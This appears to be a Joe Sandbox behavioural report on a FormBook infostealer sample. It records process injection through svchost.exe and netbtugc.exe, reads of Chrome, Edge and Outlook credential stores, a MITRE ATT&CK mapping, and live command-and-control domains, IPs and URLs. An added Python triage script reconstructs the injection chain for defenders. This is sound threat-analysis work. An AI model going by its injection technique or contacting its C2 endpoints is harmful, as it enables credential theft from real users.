Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 5624
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 47B008
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000BBE95 LogonUserW
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_0008374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000C4B52 SendInput,keybd_event
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000C7DD5 mouse_event
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
Source: C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000BB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000BBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: r3T-ENQ-O-2024-10856.exe, rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: rYmePGTGlPk.exe, 00000005.00000000.2503856099.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3347107549.0000000001541000.00000002.00000001.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3346907528.0000000001491000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000A7254 cpuid
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000A40DA GetSystemTimeAsFileTime,__aulldiv
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000FC146 GetUserNameW
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000B2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_0009E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: WIN_81
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: WIN_XP
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: WIN_XPe
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: WIN_VISTA
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: WIN_7
Source: r3T-ENQ-O-2024-10856.exe | Binary or memory string: WIN_8
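The two findings a responder pulls out of this report first are the injection chain in the HIPS / PFW section (RWX section mappings from the submitted sample into svchost.exe, from svchost.exe into the dropped rYmePGTGlPk.exe and netbtugc.exe, a queued APC, and the process-creation entries) and the credential-store reads just above (Chrome and Edge Login Data, Cookies and Local State, plus the Outlook profile key, all opened by netbtugc.exe rather than by a browser or mail client). The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code. It reads behaviour lines normalised to the form "Source: <process> | <Action>: <detail>" (constructed here from the report's entries), walks the cross-process edges from the submitted sample to recover the chain r3T-ENQ-O-2024-10856.exe -> svchost.exe -> rYmePGTGlPk.exe -> netbtugc.exe -> firefox.exe, and flags credential-store access by any process that is not the store's own owner. The line format, the credential-store path rules and the expected-reader list are this example's assumptions, and the single chrome.exe control line is constructed, not taken from the report.

```python
"""Triage of Joe Sandbox behaviour lines: injection chain and credential-store reads.

Added example, not part of the report or of Joe Sandbox. The event lines are
constructed from the report's own entries, normalised to
"Source: <process> | <Action>: <detail>"; the parser, the credential-store path
rules and the expected-reader list are this example's assumptions.
"""
import re
from collections import defaultdict

# Processes named in the report (drop directory exactly as reported).
SAMPLE = r"C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
INJECTED = (r"C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM"
            r"\rYmePGTGlPk.exe")
NETBT = r"C:\Windows\SysWOW64\netbtugc.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
RWX = "execute and read and write"

EVENTS = [  # constructed from the report's behaviour entries
    rf"Source: {SAMPLE} | Section loaded: NULL target: {SVCHOST} protection: {RWX}",
    rf"Source: {SAMPLE} | Memory written: {SVCHOST} base: 47B008",
    rf'Source: {SAMPLE} | Process created: {SVCHOST} "{SAMPLE}"',
    rf"Source: {SVCHOST} | Section loaded: NULL target: {INJECTED} protection: {RWX}",
    rf"Source: {SVCHOST} | Section loaded: NULL target: {NETBT} protection: {RWX}",
    rf'Source: {INJECTED} | Process created: {NETBT} "{NETBT}"',
    rf"Source: {NETBT} | Section loaded: NULL target: {INJECTED} protection: read write",
    rf"Source: {NETBT} | Section loaded: NULL target: {INJECTED} protection: {RWX}",
    rf"Source: {NETBT} | Thread APC queued: target process: {INJECTED}",
    rf"Source: {NETBT} | Section loaded: NULL target: {FIREFOX} protection: {RWX}",
    rf'Source: {NETBT} | Process created: {FIREFOX} "{FIREFOX}"',
    rf"Source: {NETBT} | File opened: {CHROME}\Login Data",
    rf"Source: {NETBT} | File opened: {CHROME}\Local State",
    rf"Source: {NETBT} | File opened: {CHROME}\Network\Cookies",
    rf"Source: {NETBT} | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT"
    "\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\",
    # Constructed control line (not in the report): a browser reading its own store.
    rf"Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File opened: {CHROME}\Login Data",
]

LINE_RE = re.compile(r"^Source: (?P<src>.+?) \| (?P<action>[A-Za-z ]+): (?P<detail>.*)$")
DETAIL_RE = {  # action -> (pattern yielding the target process, edge kind)
    "Section loaded": (re.compile(r"^NULL target: (?P<dst>.+?) protection: (?P<prot>.+)$"), "map"),
    "Memory written": (re.compile(r"^(?P<dst>.+?) base: [0-9A-Fa-f]+$"), "write"),
    "Thread APC queued": (re.compile(r"^target process: (?P<dst>.+)$"), "apc"),
    "Process created": (re.compile(r'^(?P<dst>.+?) "'), "spawn"),
}
CRED_FILE_RE = re.compile(r"\\User Data\\(?:.*\\)?(Login Data|Cookies|Web Data|Local State)$")
CRED_KEY_RE = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.IGNORECASE)
EXPECTED_READERS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse(lines):
    """Split each line into source, action and detail; lines of any other shape are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, lines) if m]


def injection_edges(events):
    """(src, dst, kind) for every event in which src reaches into another process."""
    edges = []
    for e in events:
        pattern, kind = DETAIL_RE.get(e["action"], (None, None))
        m = pattern and pattern.match(e["detail"])
        if not m:
            continue
        if kind == "map" and m["prot"] == RWX:
            kind = "map-rwx"  # an executable mapping is where the payload lands
        edges.append((e["src"], m["dst"], kind))
    return edges


def injection_chain(edges, root):
    """Process names reachable from root over the edges, depth-first, first reach wins."""
    children = defaultdict(list)
    for src, dst, _ in edges:
        if dst not in children[src]:
            children[src].append(dst)
    order, stack = [], [root]
    while stack:
        node = stack.pop()
        if node not in order:
            order.append(node)
            stack.extend(reversed(children[node]))
    return [basename(p) for p in order]


def credential_store_access(events):
    """Sorted (reader, artefact) for store reads by a process that does not own the store."""
    hits = set()
    for e in events:
        m = e["action"] == "File opened" and CRED_FILE_RE.search(e["detail"])
        key = e["action"] == "Key opened" and CRED_KEY_RE.search(e["detail"])
        if not (m or key):
            continue
        reader = basename(e["src"]).lower()
        if reader not in EXPECTED_READERS:
            hits.add((reader, "browser:" + m.group(1) if m else "outlook-profile"))
    return sorted(hits)


if __name__ == "__main__":
    events = parse(EVENTS)
    print(" -> ".join(injection_chain(injection_edges(events), SAMPLE)))
    for reader, artefact in credential_store_access(events):
        print(f"{reader} opened {artefact}")
```

The chain walk treats a read-write mapping, an RWX mapping, a memory write, a queued APC and a process creation as the same kind of edge, because any of them is enough to place one process under another's control; the RWX distinction is kept on the edge so that a reviewer can see where executable code was actually placed. Local State is on the credential-store list because it holds the DPAPI-wrapped key that protects the values in Login Data and Cookies on current Chromium builds, which is why a stealer opens it alongside them.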

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe | Code function: 0_2_000D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix

Techniques the report mapped, listed per tactic with the signature count shown in the matrix in parentheses (counts reproduced as rendered). Tactics and techniques without a count had no matching signature and are omitted.

Reconnaissance: none
Resource Development: none
Initial Access: Valid Accounts (2)
Execution: Native API (2)
Persistence: DLL Side-Loading (1); Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21)
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Exfiltration: none
Impact: System Shutdown/Reboot (1)
Behavior graph (ID 1510735; sample r3T-ENQ-O-2024-10856.exe; start date 13/09/2024; architecture WINDOWS; score 100), rendered as text:

Contacted: www.mediaplug.biz; www.masteriocp.online; 5 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures

r3T-ENQ-O-2024-10856.exe (started)
    Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    -> svchost.exe (started)
        Maps a DLL or memory area into another process
        -> rYmePGTGlPk.exe (injected)
            Found direct / indirect Syscall (likely to bypass EDR)
            -> netbtugc.exe (started)
                Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> rYmePGTGlPk.exe (injected)
                    www.independent200.org 103.42.108.46, 61309, 80 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia
                    www.mediaplug.biz 66.81.203.10, 61307, 61308, 80 CONFLUENCE-NETWORK-INCVG Virgin Islands (BRITISH)
                    2 other IPs or domains
                    Found direct / indirect Syscall (likely to bypass EDR)
                -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
r3T-ENQ-O-2024-10856.exe | 26% | ReversingLabs | |
r3T-ENQ-O-2024-10856.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://www.mediaplug.biz/osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd | 0% | Avira URL Cloud | safe |
http://www.chamadaslotgiris.net/gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd | 0% | Avira URL Cloud | safe |
http://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd | 0% | Avira URL Cloud | safe |
https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR | 0% | Avira URL Cloud | safe |
http://www.masteriocp.online/p5rq/ | 0% | Avira URL Cloud | safe |
http://www.independent200.org | 0% | Avira URL Cloud | safe |
http://www.mediaplug.biz/osde/ | 0% | Avira URL Cloud | safe |
http://www.independent200.org/yl6y/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.independent200.org | 103.42.108.46 | true | true | | unknown
chamadaslotgiris.net | 3.33.130.190 | true | true | | unknown
dns.ladipage.com | 13.228.81.39 | true | true | | unknown
www.mediaplug.biz | 66.81.203.10 | true | true | | unknown
www.linkbasic.net | unknown | unknown | true | | unknown
www.masteriocp.online | unknown | unknown | true | | unknown
www.chamadaslotgiris.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.mediaplug.biz/osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd | true | Avira URL Cloud: safe | unknown
http://www.masteriocp.online/p5rq/ | true | Avira URL Cloud: safe | unknown
http://www.independent200.org/yl6y/ | true | Avira URL Cloud: safe | unknown
http://www.chamadaslotgiris.net/gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd | true | Avira URL Cloud: safe | unknown
http://www.mediaplug.biz/osde/ | true | Avira URL Cloud: safe | unknown
http://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.independent200.org | rYmePGTGlPk.exe, 00000007.00000002.3347309941.0000000002A81000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR | netbtugc.exe, 00000006.00000002.3348221729.0000000004638000.00000004.10000000.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3347857669.0000000003608000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
66.81.203.10 | www.mediaplug.biz | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
103.42.108.46 | www.independent200.org | Australia | 45638 | SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | true
3.33.130.190 | chamadaslotgiris.net | United States | 8987 | AMAZONEXPANSIONGB | true
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1510735
                          Start date and time:2024-09-13 12:01:10 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 35s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:r3T-ENQ-O-2024-10856.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@7/3@13/4
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 92%
                          • Number of executed functions: 56
                          • Number of non-executed functions: 282
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • VT rate limit hit for: r3T-ENQ-O-2024-10856.exe
Time | Type | Description
06:03:34 | API Interceptor | 552462x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
66.81.203.10 | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • www.mediaplug.biz/osde/
13.228.81.39 | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | Get hash | malicious | FormBook | Browse |
  • www.tmstore.click/xme5/?RD4=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&VzA=dz5HvTSP4ZdlFHDP
  | z11SOAAUG2408.exe | Get hash | malicious | FormBook | Browse |
  • www.masteriocp.online/p5rq/
  | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse |
  • www.masteriocp.online/wg84/
  | Proforma_Invoice.pif.exe | Get hash | malicious | FormBook | Browse |
  • www.againbeautywhiteskin.asia/3h10/
  | Arrival Notice.bat.exe | Get hash | malicious | FormBook | Browse |
  • www.againbeautywhiteskin.asia/3h10/
  | Arrival Notice.bat.exe | Get hash | malicious | FormBook | Browse |
  • www.againbeautywhiteskin.asia/3h10/
  | ORDER TKHA-A88163341B.bat.exe | Get hash | malicious | FormBook | Browse |
  • www.againbeautywhiteskin.asia/3h10/
  | Purchase Order #PO-240902.vbs | Get hash | malicious | FormBook | Browse |
  • www.hisako.store/55sn/
  | Arrival Notice.bat.exe | Get hash | malicious | FormBook | Browse |
  • www.againbeautywhiteskin.asia/3h10/
  | P1 HWT623ATG.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse |
  • www.againbeautywhiteskin.asia/3h10/
103.42.108.46 | 3T-ENQ-O-2024-10856.exe | Get hash | malicious | FormBook | Browse |
  • www.independent200.org/yl6y/
  | New Purchase Order.exe | Get hash | malicious | FormBook | Browse |
  • www.mbwd.store/pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr
  | Scan 00093847.exe | Get hash | malicious | FormBook | Browse |
  • www.mbwd.store/pn1r/
  | LKkVS1VFJD.exe | Get hash | malicious | FormBook | Browse |
  • www.independent200.org/peuo/
